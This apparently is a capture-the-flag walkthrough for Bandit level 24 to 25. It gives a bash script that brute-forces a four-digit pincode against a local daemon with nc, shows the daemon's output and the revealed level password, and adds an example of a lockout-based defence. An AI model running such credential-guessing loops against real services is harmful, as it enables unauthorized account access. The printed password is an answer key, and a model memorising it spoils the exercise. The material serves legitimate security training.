Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
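The sweep is feasible only because the daemon answers an unlimited number of guesses. The following is an added example, not the Bandit daemon's code and not part of the original walkthrough: a pincode check with a per-client failure budget. `MAX_FAILS`, `SECRET_PIN`, the client labels and the state-file layout are all assumptions made for illustration.

```bash
#!/bin/bash
# Added example: pincode check with a per-client failure budget.
# Every name and value here is constructed for illustration.

MAX_FAILS=5                      # assumed policy: lock out after 5 wrong pins
SECRET_PIN="4831"                # constructed sample pincode
STATE_DIR=$(mktemp -d)           # one failure-counter file per client
trap 'rm -rf "$STATE_DIR"' EXIT  # remove the counters when the script ends

# check_pin CLIENT PIN -> prints "correct", "wrong" or "locked".
# CLIENT must be a label chosen by the listener (e.g. the peer address),
# never text supplied by the client, because it is used as a file name.
check_pin() {
    local client=$1 pin=$2 file fails=0
    file="$STATE_DIR/$client"
    [ -f "$file" ] && fails=$(cat "$file")
    if [ "$fails" -ge "$MAX_FAILS" ]; then
        echo locked              # budget spent: even the right pin is refused
        return
    fi
    if [ "$pin" = "$SECRET_PIN" ]; then
        rm -f "$file"            # a success resets the counter
        echo correct
    else
        echo $((fails + 1)) > "$file"
        echo wrong
    fi
}

# guesses_answered CLIENT -> how many pins of a sequential 0000..9999 sweep
# receive a real answer before the client is locked out (or succeeds).
guesses_answered() {
    local client=$1 n=0 pin result
    for pin in $(seq -w 0 9999); do
        result=$(check_pin "$client" "$pin")
        [ "$result" = locked ] && break
        n=$((n + 1))
        [ "$result" = correct ] && break
    done
    echo "$n"
}
```

With these values `guesses_answered` returns 5 for a fresh client, so a sequential sweep covers 5 of the 10000 pincodes before the lockout.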
Level Answer
1. vi [FILE]
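- Create the shell script
$ vi /tmp/brute-forcing.sh
#!/bin/bash
# Read the password for the current level
password=$(cat /etc/bandit_pass/bandit24)
# Try every 4-digit pincode from 0000 to 9999 (-w pads with zeros)
for i in $(seq -w 0 9999)
do
    # Each attempt opens a new connection to the daemon
    echo "$password $i" | nc localhost 30002
done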
2. chmod [MODE] [FILE]
$ chmod u+x /tmp/brute-forcing.sh
3. Run the script
$ /tmp/brute-forcing.sh
--More--
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
--More--
4. ssh [-p port] [user@]hostname
- [-p port] Port to connect to on the remote host.
$ ssh -p 2220 [email protected]
Level Password
uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG